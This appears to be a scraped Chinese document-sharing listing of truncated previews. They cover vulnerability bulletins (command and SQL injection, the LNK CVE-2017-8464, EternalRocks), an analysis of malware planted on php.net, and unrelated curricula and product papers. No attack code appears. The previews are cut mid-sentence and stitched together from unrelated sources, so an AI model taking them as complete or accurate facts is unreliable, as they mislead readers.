目 录 1 本周漏洞通告 漏洞一 :NSFOCUS RSAS V6.0 存在命令注入漏洞 漏洞二 :SEMCMS 外贸网站 PHP 多语言版 V2.7 存在 SQL 注入漏洞 漏洞三 :Oracle JD Edwards EnterpriseOne 北京安域领创科技有限公司 安全服务通告 报告周期 :2018 年 7 月第三周 (2018 年 07 月 16 日 -2018 年 07 月 22 日 ) 目 录 1 本周漏洞通告...1 1.1 漏洞一 :NSFOCUS RSAS V6.0 存在命令注入漏洞... 1 1.2 漏洞二 :SEMCMS 外贸网站 PHP 多语言版 V2.7 存在 SQL 注入漏洞... 2 1.3 漏洞三 :Oracle

More information

声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本 公 司 负 责 人 和 主 管 会 计 工

声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本 公 司 负 责 人 和 主 管 会 计 工 Shenzhen WitSoft Information Technology Co., Ltd. 主 办 券 商 二 〇 一 六 年 二 月 声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本

More information

Microsoft Word - 书目文件.doc

Microsoft Word - 书目文件.doc 计 算 机 类 算 法 与 程 序 设 计 类 1 11025 数 据 结 构 ( 第 三 版 ) 十 一 五 国 家 级 规 划 教 材 刘 振 鹏 等 28.00 2010.5 本 科 2 11563 数 据 结 构 习 题 解 答 与 实 验 指 导 ( 第 三 版 ) 石 强 等 21.00 2010.7 本 科 3 07628 数 据 结 构 与 算 法 王 昆 仑 35.00 2007.6

More information

叮当旺业通

叮当旺业通 叮 当 旺 业 通 即 时 通 讯 系 统 解 决 方 案 上 海 富 可 信 息 技 术 发 展 有 限 公 司 2011 年 06 月 03 日 日 期 版 本 说 明 变 更 人 批 准 日 期 批 准 人 目 录 第 一 部 分 引 言... 1 1.1 编 写 目 的... 1 1.2 项 目 背 景... 1 1.3 定 义... 1 1.4 参 考 资 料... 1 第 二 部 分 任

More information

目录 第 1 章安全通告... 3 第 2 章漏洞信息 漏洞描述... 5 震网三代 LNK 文件远程代码执行漏洞 (cve )... 5 Windows 搜索远程命令执行漏洞 (cve ) 风险等级... 6 第 3 章处置建

目录 第 1 章安全通告... 3 第 2 章漏洞信息 漏洞描述... 5 震网三代 LNK 文件远程代码执行漏洞 (cve )... 5 Windows 搜索远程命令执行漏洞 (cve ) 风险等级... 6 第 3 章处置建 震网三代 及其他高危漏洞 安全预警通告 第 2 次更新 2017 年 06 月 14 日 目录 第 1 章安全通告... 3 第 2 章漏洞信息... 5 2.1 漏洞描述... 5 震网三代 LNK 文件远程代码执行漏洞 (cve-2017-8464)... 5 Windows 搜索远程命令执行漏洞 (cve-2017-8543)... 5 2.2 风险等级... 6 第 3 章处置建议... 7

More information

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 4 月报告 北京师范大学信息网络中心 2019 年 5 月

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 4 月报告 北京师范大学信息网络中心 2019 年 5 月 2019 年 4 月报告 北京师范大学信息网络中心 2019 年 5 月 目录 漏洞态势... 3 1. 公开漏洞情况... 4 1.1. 漏洞增长概况... 4 1.2. 漏洞分布情况... 5 1.2.1. 漏洞厂商分布... 5 1.2.2. 漏洞产品分布... 5 1.2.3. 漏洞类型分布... 6 1.2.4. 漏洞危害等级分布... 7 1.3. 漏洞修复情况... 8 1.3.1.

More information

前沿技术 php.net 被植入恶意代码分析 核心技术部张云海 关键字 :php.net 挂马 Magnitude 摘要 : 本文对 2013 年 10 月 php.net 被植入的恶意代码进行分析 1. 引言 013 年 10 月 23 日,Google 的 Safe Browsing 检测到 p

前沿技术 php.net 被植入恶意代码分析 核心技术部张云海 关键字 :php.net 挂马 Magnitude 摘要 : 本文对 2013 年 10 月 php.net 被植入的恶意代码进行分析 1. 引言 013 年 10 月 23 日,Google 的 Safe Browsing 检测到 p php.net 被植入恶意代码分析 核心技术部张云海 关键字 :php.net 挂马 Magnitude 摘要 : 本文对 2013 年 10 月 php.net 被植入的恶意代码进行分析 1. 引言 013 年 10 月 23 日,Google 的 Safe Browsing 检测到 php.net 存在下载 安装恶意软 2件的行为, 将该网站标记为可疑 php.net 的管理者对此进行了调查,

More information

否受到木马感染 也可到此网址下载查杀工具到内网查杀病毒 二 震网三代 漏洞 北京时间 6 月 14 日凌晨, 微软发布安全公告称,Windows 快捷方式存在高危漏洞 (CVE ), 黑客可以通过 U 盘 网络共享等途径触发漏洞, 完全控制用户系统 此漏洞与震网病毒攻破伊朗核电站使

否受到木马感染 也可到此网址下载查杀工具到内网查杀病毒 二 震网三代 漏洞 北京时间 6 月 14 日凌晨, 微软发布安全公告称,Windows 快捷方式存在高危漏洞 (CVE ), 黑客可以通过 U 盘 网络共享等途径触发漏洞, 完全控制用户系统 此漏洞与震网病毒攻破伊朗核电站使 黄山市公安局 关于做好近期木马及网络安全漏洞安全防范的通报 市网络安全等级保护工作领导小组成员单位 市直各重要信息系统和网站运营使用单位 : 接安徽省信息安全等级保护协调小组办公室通报, 近期国家互联网应急中心 微软公司等机构发布了多起危害较大的木马 网络安全漏洞预警 同时据掌握, 近日境外黑客组织 匿名者 正在向我国各级政务网站发起一轮攻击和入侵, 目前国家博物馆网站手机端已确认受到攻击和入侵 为提高我市政府网站和重要信息系统的安全防范能力,

More information

近四年网络工程专业培养方案.doc

近四年网络工程专业培养方案.doc 1978 2002 2007 2010 54 6 17 18 7 32 8 800 200 1995 1600 30 100 300 SCIEIISTP 70 I 2009.....1 2010...10 2011...19 20...28 1...37...39...43 II 1 2009 1 1. 2. 3. 4. 5. 2 1. 2. C JAVA 3. 4. 3 4 C JAVA * *

More information

信息

信息 信 息 与 算 机 工 院 算 机 科 与 技 术 人 才 培 养 方 案 ( 代 码 :080901) 一 培 养 目 标 培 养 适 应 国 家 建 设 发 展 需 要, 德 智 体 全 面 发 展, 具 有 良 好 的 科 素 养 和 丰 厚 的 人 文 底 蕴, 掌 握 扎 的 算 机 科 核 心 基 础 理 论 知 识 和 主 流 工 技 术, 了 解 本 的 前 沿 发 展 现 状 和

More information

60 50 42 10 32

60 50 42 10 32 2006 9 1 24 N*2M E1 2M VPN 60 50 42 10 32 1 2 3 4 5 2006 1 2 3 4 5 6 B/S 7 1 2 10M/100M 2K 500ms 10000 2M 5 Windows IBM AIX HP Unix Linux CPU SMP Cluster Weblogic Webshpere Tomcat JBoss, Oracle Sybase

More information

学 院 人 才 培 养 分 项 自 评 报 告 结 果 汇 总 表 主 要 评 估 指 标 关 键 评 估 要 素 自 评 等 级 1.1 学 校 事 业 发 展 规 划 合 格 1. 领 导 作 用 1.2 办 学 目 标 与 定 位 合 格 1.3 对 人 才 培 养 重 视 程 度 合 格 1

学 院 人 才 培 养 分 项 自 评 报 告 结 果 汇 总 表 主 要 评 估 指 标 关 键 评 估 要 素 自 评 等 级 1.1 学 校 事 业 发 展 规 划 合 格 1. 领 导 作 用 1.2 办 学 目 标 与 定 位 合 格 1.3 对 人 才 培 养 重 视 程 度 合 格 1 目 录 学 院 人 才 培 养 分 项 自 评 报 告 结 果 汇 总 表 1 1 领 导 作 用 2 1.1 学 校 事 业 发 展 规 划 2 1.2 办 学 目 标 与 定 位 6 1.3 对 人 才 培 养 重 视 程 度 11 1.4 校 园 稳 定 15 2 师 资 队 伍 19 2.1 专 任 教 师 19 2.2 兼 职 教 师 24 3 课 程 建 设 27 3.1 课 程 内 容

More information

投影片 1

投影片 1 真 善 美 幼 兒 園 102 學 年 度 第 二 學 期 小 廚 師 阿 諾 @ 活 動 日 期 :2/12~4/11 @ 活 動 班 級 : 獅 子 班 @ 製 作 編 輯 : 徐 淑 芬 *. *. 主 題 目 標. *. * 一. 能 分 享 自 己 長 大 的 志 願 二. 認 識 食 物 金 字 塔 以 及 食 物 的 營 養 三. 透 過 戶 外 教 學 到 傳 統 市 場 挑 選 新

More information

北京安域领创科技有限公司 北京安域领创科技有限公司 安全服务通告 报告周期 :2017 年 10 月第二周 (2017 年 10 月 9 日 年 10 月 15 日 )

北京安域领创科技有限公司 北京安域领创科技有限公司 安全服务通告 报告周期 :2017 年 10 月第二周 (2017 年 10 月 9 日 年 10 月 15 日 ) 安全服务通告 报告周期 :2017 年 10 月第二周 (2017 年 10 月 9 日 -2017 年 10 月 15 日 ) 目录 1 本周漏洞通告...1 1.1 漏洞一 :Apache Tomcat 远程代码执行漏洞... 1 1.2 漏洞二 :PHPCMS V9.6.3 后台存在 CSRF 漏洞和任意文件写入漏洞... 1 1.3 漏洞三 :Joomla! 组件 Ajax Quiz SQL

More information

胡 鑫 陈兴蜀 王海舟 刘 磊 利用基于协议分析和逆向工程的主动测量方法对 点播系统进行了研究 通过对 点播协议进行分析 获悉该协议的通信格式和语义信息 总结出了 点播系统的工作原理 在此基础上设计并实现了基于分布式网络爬虫的 点播系统主动测量平台 并对该平台获取的用户数据进行统计分析 获得了 点播系统部分用户行为特征 研究结果对 点播系统的监控及优化提供了研究方法 点播 协议分析 爬虫 主动测量

More information

目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡 器...8 客 户 端 :Web 浏 览 器 和 移 动 应 用 程 序...8 客 户 端 :Tableau Desktop..

目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡 器...8 客 户 端 :Web 浏 览 器 和 移 动 应 用 程 序...8 客 户 端 :Tableau Desktop.. Neelesh Kamkolkar, 产 品 经 理 Ellie Fields, 产 品 营 销 副 总 裁 Marc Rueter, 战 略 解 决 方 案 高 级 总 监 适 用 于 企 业 的 Tableau: IT 概 述 目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡

More information

IQ

IQ TRITON APX IQ TRITON APX TRITON APX TRITON TRITON APX TRITON AP-WEB Websense ACE Web DLP TRITON APX IT TRITON APX Web TRITON APX DLP TRITON APX DLP Web (DLP) TRITON AP-WEB TRITON AP-EMAIL DLP (OCR) TRITON

More information

減肥的動力.doc

減肥的動力.doc 篇 名 : 減 肥 的 動 力 作 者 : 林 仁 宏 高 雄 高 商 進 修 學 校 三 年 7 班 1 壹 前 言 現 今 的 社 會, 食 物 都 轉 成 精 緻 化, 相 對 的 熱 量 高 卻 沒 有 營 養, 然 而 肥 胖 的 人 數 也 越 來 越 多, 也 缺 乏 了 運 動! 漸 漸 有 些 人 要 減 肥, 開 始 食 用 一 些 減 肥 藥 抽 脂 肪. 等 等, 減 肥 藥

More information

大连理工大学专业学位硕士学位论文

大连理工大学专业学位硕士学位论文 学 生 姓 名 : 刘 效 坤, 盖 文 迪, 郭 乐 铭 周 晓 红, 齐 凤 霞, 张 英 明 学 专 班 院 : 信 息 学 院 业 : 物 联 网 工 程 级 : 13 级 学 号 : 201303041059 指 导 教 师 : 张 丽 审 阅 教 师 : 张 丽 完 成 日 期 : 2015/10/11 摘 要 本 文 采 用 自 顶 向 下 的 结 构 化 的 网 站 分 析 方 法,

More information

樣 的 深 不 管 是 怎 樣, 對 方 真 的 要 結 束 同 居 關 係, 真 的 都 會 好 好 講 清 楚 和 溝 通, 傷 害 是 一 定 會 有, 但 不 要 用 到 雙 方 像 敵 人 一 樣, 這 樣 對 雙 方 來 說, 有 什 麼 意 義 存 在 呢?! 因 為 彼 此 之 間

樣 的 深 不 管 是 怎 樣, 對 方 真 的 要 結 束 同 居 關 係, 真 的 都 會 好 好 講 清 楚 和 溝 通, 傷 害 是 一 定 會 有, 但 不 要 用 到 雙 方 像 敵 人 一 樣, 這 樣 對 雙 方 來 說, 有 什 麼 意 義 存 在 呢?! 因 為 彼 此 之 間 同 居 優 缺 點 分 析 優 異 學 生 作 業 觀 摩 班 級 : 企 管 三 美 學 號 :96409187 姓 名 : 顏 欣 儀 優 點 : 1. 彼 此 之 間 更 加 了 解 對 方 2. 可 以 更 了 解 彼 此 的 生 活 型 態 和 真 面 貌 3. 可 以 互 相 省 錢 ( 共 同 分 擔 家 計 ) 還 有 如 果 是 在 熱 戀 中 的 話, 那 一 定 是 每 天 某

More information

投影片 1

投影片 1 2014 大 學 18 學 群 講 座 管 理 / 財 經 / 建 築 / 資 訊 學 群 介 紹 主 講 人 : 張 奇 博 士 張 奇 老 師 簡 介 學 術 經 歷 高 中 輔 導 經 歷 «英 國 倫 敦 大 學 國 王 學 院 博 士 後 研 究 員 «高 雄 女 中 竹 北 高 中 彰 化 高 中 中 和 高 中 衛 道 中 學 彰 «國 立 大 學 企 業 管 理 學 博 士 化 藝

More information

计算机网络实验说明

计算机网络实验说明 计算机网络实验说明 龚旭东 电三楼 420 lzgxd@mailustceducn 2011 年 11 月 1 日 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 1 / 20 Outline 1 实验系统介绍 实验环境实验流程 2 实验内容编程实验交互实验观察实验 3 一些控制台命令 4 实验报告说明 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 2

More information

培 训 机 构 介 绍 中 科 普 开 是 国 内 首 家 致 力 于 IT 新 技 术 领 域 的 领 航 者, 专 注 于 云 计 算 大 数 据 物 联 网 移 动 互 联 网 技 术 的 培 训, 也 是 国 内 第 一 家 开 展 Hadoop 云 计 算 的 培

培 训 机 构 介 绍  中 科 普 开 是 国 内 首 家 致 力 于 IT 新 技 术 领 域 的 领 航 者, 专 注 于 云 计 算 大 数 据 物 联 网 移 动 互 联 网 技 术 的 培 训, 也 是 国 内 第 一 家 开 展 Hadoop 云 计 算 的 培 Hadoop 2.0 培 训 Hadoop 2.0Training Hadoop 2.0 运 维 与 开 发 实 战 培 训 邀 请 函 培 训 机 构 介 绍 www.zkpk.org 中 科 普 开 是 国 内 首 家 致 力 于 IT 新 技 术 领 域 的 领 航 者, 专 注 于 云 计 算 大 数 据 物 联 网 移 动 互 联 网 技 术 的 培 训, 也 是 国 内 第 一 家 开

More information

PowerPoint Presentation

PowerPoint Presentation 1 版权所有 2011,Oracle 和 / 或其分支机构 保留所有权利 从幻灯片 8 中插入信息保护策略分类 WAC Widget Java ME 手机新动向陈志宇 2 版权所有 2011,Oracle 和 / 或其分支机构 保留所有权利 从幻灯片 8 中插入信息保护策略分类 以下内容旨在概述我们产品总的发展方向 该内容仅供参考, 不可纳入任何合同 该内容不构成提供任何材料 代码或功能的承诺, 并且不应该作为制定购买决策的依据

More information

(DMO) 1 1 Microsoft Windows SQL Server 2005 SQL Server Analysis ServicesNotification Services SQL Server 8 SQL Server IP SQL Server 2005 SQL Server 20

(DMO) 1 1 Microsoft Windows SQL Server 2005 SQL Server Analysis ServicesNotification Services SQL Server 8 SQL Server IP SQL Server 2005 SQL Server 20 Microsoft.com Go SQL Server Windows Server System > SQL Server 2005 SQL Server 2005 SQL Server TechCenter SQL SQL Server Server 2005 (IT) SQL Server SQL Server 2005 IT SQL Server 2005 SQL Server 2005 SQL

More information

11 天 山 区 区 环 卫 清 运 队 机 械 工 程 师 4011 C 1 不 限 不 限 机 电 具 有 两 以 工 作 经 12 天 山 区 乌 鲁 木 齐 市 第 15 小 会 计 4012 C 1 不 限 不 限 会 计 财 会 财 电 算 化 临 床 医 预 防 医 公 共 卫 生 与

11 天 山 区 区 环 卫 清 运 队 机 械 工 程 师 4011 C 1 不 限 不 限 机 电 具 有 两 以 工 作 经 12 天 山 区 乌 鲁 木 齐 市 第 15 小 会 计 4012 C 1 不 限 不 限 会 计 财 会 财 电 算 化 临 床 医 预 防 医 公 共 卫 生 与 2013 乌 鲁 木 齐 市 事 业 单 工 作 员 表 序 1 天 山 区 区 委 财 经 领 导 小 组 办 公 室 ( 金 融 工 作 办 公 室 ) 金 融 工 作 专 干 4001 C 2 不 限 不 限 硕 士 研 究 生 会 计 财 务 管 理 财 务 会 计 基 建 会 计 行 政 事 业 财 务 会 计 2 天 山 区 区 园 林 队 会 计 4002 C 1 不 限 不 限 财

More information

警惕类 永恒之石 蠕虫借助 NSA 工具 发起更大规模攻击 近日, 金睛安全研究团队监控到另一个利用 NSA 泄露工具的蠕虫病毒 EternalRocks( 永恒之石 ) 开始在互联网上传播 永恒之石 和 wannacry 蠕虫一样, 都通过 MS SMB 漏洞传播, 但它却同时集成了

警惕类 永恒之石 蠕虫借助 NSA 工具 发起更大规模攻击 近日, 金睛安全研究团队监控到另一个利用 NSA 泄露工具的蠕虫病毒 EternalRocks( 永恒之石 ) 开始在互联网上传播 永恒之石 和 wannacry 蠕虫一样, 都通过 MS SMB 漏洞传播, 但它却同时集成了 警惕类 永恒之石 蠕虫借助 NSA 工具 发起更大规模攻击 近日, 金睛安全研究团队监控到另一个利用 NSA 泄露工具的蠕虫病毒 EternalRocks( 永恒之石 ) 开始在互联网上传播 永恒之石 和 wannacry 蠕虫一样, 都通过 MS17-010 SMB 漏洞传播, 但它却同时集成了 7 种 NSA 工具 (EternalBlue,EternalRomance,Eternalsynergy,

More information

内 容 协 作 平 台 TRS WCM 6.5 北 京 拓 尔 思 信 息 技 术 股 份 有 限 公 司 Beijing TRS Information Technology Co., Ltd 版 权 说 明 本 手 册 由 北 京 拓 尔 思 信 息 技 术 股 份 有 限 公 司 ( 以 下 简 称 TRS 公 司 ) 出 版, 版 权 属 TRS 公 司 所 有 未 经 出 版 者 正 式

More information

XXXXXXXX http://cdls.nstl.gov.cn 2 26

XXXXXXXX http://cdls.nstl.gov.cn 2 26 [ ] [ ] 2003-7-18 1 26 XXXXXXXX http://cdls.nstl.gov.cn 2 26 (2003-7-18) 1...5 1.1...5 1.2...5 1.3...5 2...6 2.1...6 2.2...6 2.3...6 3...7 3.1...7 3.1.1...7 3.1.2...7 3.1.2.1...7 3.1.2.1.1...8 3.1.2.1.2...10

More information

目录

目录 目 录 1 系 统 概 述... 1 1.1 主 要 功 能... 1 1.2 工 作 环 境 要 求... 2 1.2.1 硬 件 环 境... 2 1.2.2 操 作 系 统... 2 1.2.3 数 据 库... 2 1.2.4 浏 览 器... 2 2 安 装 卸 载... 3 2.1 安 装 步 骤... 3 2.2 使 用 加 密 狗... 5 2.3 卸 载 步 骤... 6 3 新

More information

Microsoft Word - 119002_Java_術科 .doc

Microsoft Word - 119002_Java_術科 .doc 電 腦 軟 體 設 計 乙 級 技 術 士 技 能 檢 定 術 科 測 試 應 檢 人 參 考 資 料 (Java) 試 題 編 號 :11900-1000201~3 審 定 日 期 :100 年 6 月 28 日 電 腦 軟 體 設 計 乙 級 技 術 士 技 能 檢 定 術 科 測 試 應 檢 人 參 考 資 料 目 錄 ( 第 二 部 分 ) 壹 電 腦 軟 體 設 計 乙 級 技 術 士 技

More information

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 8 月报告 北京师范大学信息网络中心 2019 年 9 月

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 8 月报告 北京师范大学信息网络中心 2019 年 9 月 2019 年 8 月报告 北京师范大学信息网络中心 2019 年 9 月 目录漏洞态势... 1 1. 公开漏洞情况... 1 1.1. 漏洞增长概况... 1 1.2. 漏洞分布情况... 2 1.2.1. 漏洞厂商分布... 2 1.2.2. 漏洞产品分布... 2 1.2.3. 漏洞类型分布... 3 1.2.4. 漏洞危害等级分布... 5 1.3. 漏洞修复情况... 5 1.3.1. 整体修复情况...

More information

附 件 : 2009 年 度 国 家 精 品 课 程 名 单 一 本 科 国 家 精 品 课 程 ( 以 学 科 为 序, 共 400 门 ) 序 号 一 级 学 科 二 级 学 科 课 程 名 称 学 校 名 称 负 责 人 1 哲 学 哲 学 类 马 克 思 主 义 伦 理 学 安 徽 师 范

附 件 : 2009 年 度 国 家 精 品 课 程 名 单 一 本 科 国 家 精 品 课 程 ( 以 学 科 为 序, 共 400 门 ) 序 号 一 级 学 科 二 级 学 科 课 程 名 称 学 校 名 称 负 责 人 1 哲 学 哲 学 类 马 克 思 主 义 伦 理 学 安 徽 师 范 附 件 : 2009 年 度 国 家 精 品 课 程 名 单 一 本 科 国 家 精 品 课 程 ( 以 学 科 为 序, 共 400 门 ) 序 号 一 级 学 科 二 级 学 科 课 程 名 称 学 校 名 称 负 责 人 1 哲 学 哲 学 类 马 克 思 主 义 伦 理 学 安 徽 师 范 大 学 钱 广 荣 2 哲 学 哲 学 类 马 克 思 主 义 哲 学 北 京 师 范 大 学 杨 耕

More information

“百企入校——广西青年企业家协会高校

“百企入校——广西青年企业家协会高校 百 企 入 校 广 西 青 年 企 业 家 协 会 高 校 毕 业 生 就 业 专 场 招 聘 会 信 息 简 介 时 间 :2016 年 6 月 12 日 9:00 14:00 地 点 : 广 西 财 经 学 院 明 秀 校 区 东 区 篮 球 场 ( 南 宁 市 西 乡 塘 区 明 秀 西 路 100 号 ) 面 向 对 象 : 1.2016 届 高 校 毕 业 生 往 届 毕 业 生 2. 服

More information

校友会系统白皮书feb_08

校友会系统白皮书feb_08 硕 士 研 究 生 招 生 管 理 系 统 1 产 品 白 皮 书 希 尔 数 字 校 园 硕 士 研 究 生 招 生 管 理 系 统 白 皮 书 目 录 1 产 品 概 述... 1 1.1 产 品 简 介... 1 1.2 应 用 范 围... 1 2 产 品 功 能 结 构 图... 2 3 产 品 功 能... 3 3.1 系 统 设 置... 3 3.2 信 息 发 布... 3 3.3

More information

软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7

软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7 计 算 机 系 软 件 工 程 专 业 习 指 南 广 东 科 技 院 计 算 机 系 2015-9-1 软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7

More information

附件3:

附件3: 目 录 第 一 部 分 主 体 部 分... 1 一 专 业 建 设 发 展 情 况... 1 二 专 业 培 养 目 标... 4 三 就 业 面 向... 7 四 毕 业 要 求... 10 五 课 程 体 系 与 核 心 课 程... 10 六 实 践 教 学 基 本 要 求... 16 七 教 学 及 课 程 安 排... 21 八 继 续 专 业 学 习 深 造 建 议... 25 九 其

More information

目 录 目 录... 2 1 平 台 概 述... 3 2 技 术 架 构... 4 3 技 术 特 点... 7 3.1 基 于 统 一 平 台 的 多 产 品 线 支 撑... 7 3.2 先 进 性... 7 3.3 安 全 性... 7 3.4 开 放 性... 8 3.5 高 性 能 和

目 录 目 录... 2 1 平 台 概 述... 3 2 技 术 架 构... 4 3 技 术 特 点... 7 3.1 基 于 统 一 平 台 的 多 产 品 线 支 撑... 7 3.2 先 进 性... 7 3.3 安 全 性... 7 3.4 开 放 性... 8 3.5 高 性 能 和 致 远 协 同 管 理 软 件 V5 平 台 白 皮 书 北 京 致 远 协 创 软 件 有 限 公 司 2014 年 6 月 1 / 20 目 录 目 录... 2 1 平 台 概 述... 3 2 技 术 架 构... 4 3 技 术 特 点... 7 3.1 基 于 统 一 平 台 的 多 产 品 线 支 撑... 7 3.2 先 进 性... 7 3.3 安 全 性... 7 3.4 开 放

More information

公司宣传册定稿-横版文件

公司宣传册定稿-横版文件 A good tree bears good fruit 1980 75% 500 1000 Microsoft Office Advisory Board 80Microsoft Early Adopter Partnership 30 Grape City Cluster China Shanghai, Xi an Japan International Headquarters Sendai

More information

是 证 券 市 场 的 后 来 者, 但 在 前 景 广 阔 的 道 路 上 前 行, 终 将 成 为 这 个 市 场 的 领 先 者, 这 里 会 给 你 一 个 巨 大 的 舞 台, 这 里 有 你 需 要 的 机 会, 这 里 欢 迎 优 秀 的 你! 二 招 收 条 件 1. 遵 守 国 家

是 证 券 市 场 的 后 来 者, 但 在 前 景 广 阔 的 道 路 上 前 行, 终 将 成 为 这 个 市 场 的 领 先 者, 这 里 会 给 你 一 个 巨 大 的 舞 台, 这 里 有 你 需 要 的 机 会, 这 里 欢 迎 优 秀 的 你! 二 招 收 条 件 1. 遵 守 国 家 全 国 中 小 企 业 股 份 转 让 系 统 有 限 责 任 公 司 2016 年 暑 期 实 习 生 招 收 公 告 一 公 司 简 介 全 国 中 小 企 业 股 份 转 让 系 统 ( 以 下 简 称 新 三 板 ) 是 经 国 务 院 批 准, 依 据 证 券 法 设 立 的 继 上 交 所 深 交 所 之 后 第 三 家 全 国 性 证 券 交 易 场 所, 也 是 境 内 第 一 家

More information

SiteView技术白皮书

SiteView技术白皮书 SiteView ECC V6.2 技 术 白 皮 书 游 龙 网 络 科 技 ( 中 国 ) 有 限 公 司 DragonFlow Networks(China),Inc. 目 录 第 一 章 产 品 概 述... 3 第 二 章 系 统 结 构... 6 一 系 统 架 构... 7 1 用 户 管 理 模 块... 7 2 Web Server... 8 3 存 储 加 密 模 块... 8

More information

目 录 一 安 全 漏 洞 态 势... 4 ( 一 ) 漏 洞 类 型 分 布... 4 ( 二 ) 操 作 系 统 的 漏 洞 分 布... 5 ( 三 ) 漏 洞 利 用 斱 式 分 布... 6 ( 四 ) 漏 洞 厂 商 分 布... 7 二 危 急 漏 洞 实 例... 7 ( 一 )

目 录 一 安 全 漏 洞 态 势... 4 ( 一 ) 漏 洞 类 型 分 布... 4 ( 二 ) 操 作 系 统 的 漏 洞 分 布... 5 ( 三 ) 漏 洞 利 用 斱 式 分 布... 6 ( 四 ) 漏 洞 厂 商 分 布... 7 二 危 急 漏 洞 实 例... 7 ( 一 ) 迪 普 科 技 2015 年 11 月 信 息 安 全 研 究 月 报 杭 州 迪 普 科 技 有 限 公 司 Hangzhou DPTech Technologies Co., Ltd. 版 权 所 有 侵 权 必 究 All rights reserved 第 1 页, 共 21 页 目 录 一 安 全 漏 洞 态 势... 4 ( 一 ) 漏 洞 类 型 分 布... 4 ( 二 ) 操 作

More information

背 景 概 述 企 业 需 要 一 种 灵 活 的 平 台 来 快 速 构 建 测 试 和 扩 展 新 的 应 用 程 序 服 务 并 对 市 场 中 发 生 的 数 字 化 变 革 作 出 反 应 数 字 化 变 革 正 在 加 快 步 伐, 因 为 流 程 和 信 息 的 日 益 融 合 带 来

背 景 概 述 企 业 需 要 一 种 灵 活 的 平 台 来 快 速 构 建 测 试 和 扩 展 新 的 应 用 程 序 服 务 并 对 市 场 中 发 生 的 数 字 化 变 革 作 出 反 应 数 字 化 变 革 正 在 加 快 步 伐, 因 为 流 程 和 信 息 的 日 益 融 合 带 来 白 皮 书 平 台 即 服 务 : 助 力 实 现 数 字 化 转 型 赞 助 商 :Oracle Robert P. Mahowald 2015 年 1 月 Larry Carvalho 执 行 概 要 传 统 业 务 模 式 正 在 受 到 为 客 户 提 供 多 渠 道 数 字 体 验 的 新 业 务 模 式 的 越 来 越 强 烈 的 冲 击 IDC 预 测, 到 2015 年, 在 营 销

More information

序 言 本 专 业 人 才 培 养 方 案 以 适 应 市 场 需 求 为 目 标, 根 据 学 校 校 企 双 主 体 人 才 培 养 的 要 求 和 移 动 应 用 开 发 专 业 的 特 点 设 置 课 程 体 系, 体 现 了 课 程 为 市 场 服 务 的 特 点 本 专 业 要 求 学

序 言 本 专 业 人 才 培 养 方 案 以 适 应 市 场 需 求 为 目 标, 根 据 学 校 校 企 双 主 体 人 才 培 养 的 要 求 和 移 动 应 用 开 发 专 业 的 特 点 设 置 课 程 体 系, 体 现 了 课 程 为 市 场 服 务 的 特 点 本 专 业 要 求 学 广 东 新 安 职 业 技 术 学 院 计 算 机 移 动 应 用 开 发 专 业 2016 级 人 才 培 养 方 案 专 业 方 向 负 责 人 : 梅 红 系 主 任 : 毛 立 冰 计 算 机 系 二 一 五 年 六 月 序 言 本 专 业 人 才 培 养 方 案 以 适 应 市 场 需 求 为 目 标, 根 据 学 校 校 企 双 主 体 人 才 培 养 的 要 求 和 移 动 应 用 开

More information

业 务 与 运 营 Business & Operation (Transform) 加 载 (Load) 至 目 的 端 的 过 程, 该 部 分 在 数 据 挖 掘 和 分 析 过 程 中 为 最 基 础 的 一 部 分 一 个 良 好 的 ETL 系 统 应 该 有 以 下 几 个 功 能 1

业 务 与 运 营 Business & Operation (Transform) 加 载 (Load) 至 目 的 端 的 过 程, 该 部 分 在 数 据 挖 掘 和 分 析 过 程 中 为 最 基 础 的 一 部 分 一 个 良 好 的 ETL 系 统 应 该 有 以 下 几 个 功 能 1 Business & Operation 业 务 与 运 营 大 数 据 技 术 在 精 准 营 销 中 的 应 用 王 小 鹏 北 京 东 方 国 信 科 技 股 份 有 限 公 司 北 京 100102 摘 要 简 要 介 绍 主 流 的 大 数 据 技 术 架 构 和 大 数 据 挖 掘 技 术 ; 阐 述 大 数 据 技 术 在 精 准 营 销 与 维 系 系 统 建 设 中 的 应 用,

More information

